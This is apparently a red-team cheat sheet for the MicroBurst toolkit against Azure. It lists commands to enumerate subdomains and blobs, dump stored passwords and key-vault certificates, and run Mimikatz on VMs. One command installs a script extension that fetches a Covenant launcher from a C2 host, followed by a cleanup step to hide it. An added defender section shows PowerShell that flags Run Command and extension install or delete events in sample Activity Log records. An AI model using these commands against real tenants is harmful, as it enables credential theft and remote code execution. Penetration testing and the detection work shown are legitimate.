MicroBurst

Domain Enumeration (passive):

Subdomain enum:

Invoke-EnumerateAzureSubDomains -Base CLIENT -Verbose

Blob enum:

Invoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123

Authenticate:

Connect-AzAccount

Credentials:

Gather Passwords:

Get-AzPasswords -Verbose

Cert:

Get-AzurePasswords -Keys N -AppServices N -Verbose

# Then execute the ps file: 
AuthenticateAs-XXXXX.ps1

Key Vaults:

Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize

Virtual machines:

Enum:

Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

VM Extensions:

Get-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv

Run commands:

Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript

# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1

# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup 
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension
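
For defenders: Run Command invocations and extension installs or removals like the ones above are control-plane operations recorded in the Azure Activity Log. The following is an added example, not part of MicroBurst or the original notes, that flags those operations and marks an extension removed shortly after it was installed. The records are constructed and simplified; the flat property names (Time, Caller, Status, Operation, ResourceId) and the function name are assumptions, so map real exported records (for example from Get-AzActivityLog) onto them.

```powershell
# Constructed, simplified Activity Log records (sample data, not from a real tenant).
$vm = '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/TESTER/providers/Microsoft.Compute/virtualMachines/CSETest'
$records = @(
    [pscustomobject]@{ Time = [datetime]'2024-01-10T09:00:00Z'; Caller = 'ops@example.invalid'; Status = 'Succeeded'
                       Operation = 'Microsoft.Compute/virtualMachines/start/action'; ResourceId = $vm }
    [pscustomobject]@{ Time = [datetime]'2024-01-10T09:05:00Z'; Caller = 'user1@example.invalid'; Status = 'Succeeded'
                       Operation = 'Microsoft.Compute/virtualMachines/runCommand/action'; ResourceId = $vm }
    [pscustomobject]@{ Time = [datetime]'2024-01-10T09:20:00Z'; Caller = 'user1@example.invalid'; Status = 'Succeeded'
                       Operation = 'Microsoft.Compute/virtualMachines/extensions/write'; ResourceId = "$vm/extensions/CovenantScriptExtension" }
    [pscustomobject]@{ Time = [datetime]'2024-01-10T09:35:00Z'; Caller = 'user1@example.invalid'; Status = 'Succeeded'
                       Operation = 'Microsoft.Compute/virtualMachines/extensions/delete'; ResourceId = "$vm/extensions/CovenantScriptExtension" }
)

# ARM operations that run code on a VM or change its extensions (hashtable keys match case-insensitively).
$watched = @{
    'Microsoft.Compute/virtualMachines/runCommand/action' = 'RunCommand'
    'Microsoft.Compute/virtualMachines/extensions/write'  = 'ExtensionWrite'
    'Microsoft.Compute/virtualMachines/extensions/delete' = 'ExtensionDelete'
}

# Hypothetical helper: returns one row per watched operation, oldest first.
function Find-VmCodeExecutionEvent {
    param([object[]]$Records, [timespan]$Window = [timespan]::FromHours(1))

    # Keep terminal statuses only so "Started"/"Accepted" duplicates are not double counted.
    $hits = $Records |
        Where-Object { $_.Status -in 'Succeeded', 'Failed' -and $watched.ContainsKey($_.Operation) } |
        Sort-Object Time

    foreach ($h in $hits) {
        $kind = $watched[$h.Operation]
        $note = ''
        if ($kind -eq 'ExtensionDelete') {
            # Same extension written and then deleted inside the window: one-off execution followed by cleanup.
            $write = $hits | Where-Object {
                $watched[$_.Operation] -eq 'ExtensionWrite' -and $_.ResourceId -eq $h.ResourceId -and
                $_.Time -le $h.Time -and ($h.Time - $_.Time) -le $Window
            } | Select-Object -Last 1
            if ($write) { $note = 'removed {0:N0} min after install' -f ($h.Time - $write.Time).TotalMinutes }
        }
        [pscustomobject]@{ Time = $h.Time; Kind = $kind; Caller = $h.Caller; Status = $h.Status
                           Target = ($h.ResourceId -split '/virtualMachines/')[1]; Note = $note }
    }
}

Find-VmCodeExecutionEvent -Records $records | Format-Table -AutoSize
```

The same three operation names can be used as filter terms in an Activity Log alert or SIEM rule.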

Triggering a webhook:

$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
